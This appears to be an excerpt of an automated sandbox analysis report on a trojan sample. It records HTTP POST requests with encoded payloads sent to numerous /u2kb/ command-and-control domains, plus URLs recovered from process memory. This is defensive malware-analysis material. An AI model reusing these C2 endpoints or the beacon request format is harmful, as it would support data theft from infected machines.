Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 57 6d 76 46 37 75 58 4e 7e 54 6f 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErWmvF7uXN~ToXN-P3RA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thedivinerudraksha.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedivinerudraksha.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 33 67 32 6d 46 56 73 77 33 51 47 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM163g2mFVsw3QGb~1if~g).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.un-object.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.un-object.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.un-object.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 42 34 62 52 6a 70 56 58 38 49 43 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANB4bRjpVX8ICkfkJmPA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:54 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 15:59:59 GMTContent-Type: text/htmlContent-Length: 199Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e c1 0e 82 30 10 44 ef fd 8a d5 bb 5d 34 1e 9b 26 4a 4b 6c 82 60 4c 39 70 14 a8 81 a8 10 69 91 df b7 d5 8b ff e0 de 66 f6 ed cc b2 85 c8 63 5d 9e 24 1c f4 31 85 53 b1 4f 55 0c cb 15 a2 92 3a 41 14 5a 7c 37 1b 1a 21 ca 6c c9 09 0b 9a b3 83 dc 09 2f b4 d2 a9 e4 db 68 0b d9 e0 20 19 a6 be 61 f8 35 09 c3 0f c4 f6 b9 28 c3 dd 9a ff 30 5e 11 dd 1a 18 cd 73 32 d6 99 06 8a 73 0a 38 6d 6e 15 c2 7c b1 d0 7b f6 1a 58 18 7a 70 6d 67 c1 9a f1 65 46 ea 93 ce 3e 4e f1 79 9e 69 d5 b9 60 77 b5 b1 77 d7 d0 7a 78 30 54 a1 fa 53 ea 6b c2 b3 e4 9f e7 0d 15 d1 11 fb e3 01 00 00 Data Ascii: 0D]4&JKl`L9pifc]$1SOU:AZ|7!l/h a5(0^s2s8mn|{XzpmgeF>Nyi`wwzx0TSk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:00:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Ascii: 25d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?pJ=y0bMVGhK3R&amp;s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 16:00:06 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:15 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:18 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 16:00:34 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:39 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:42 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.28expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"content-length: 11417content-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 16:00:49 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
Source: cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Open
Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://img.sedoparking.com
Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://justinmezzell.com
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l
Source: explorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
Source: explorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.dzyngiri.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576758060.000000000C94E000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
Source: HI4NJ046K.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/domain-registrieren.html
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/e-mail-server.html
Source: cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
Source: HI4NJ046K.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/rene
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
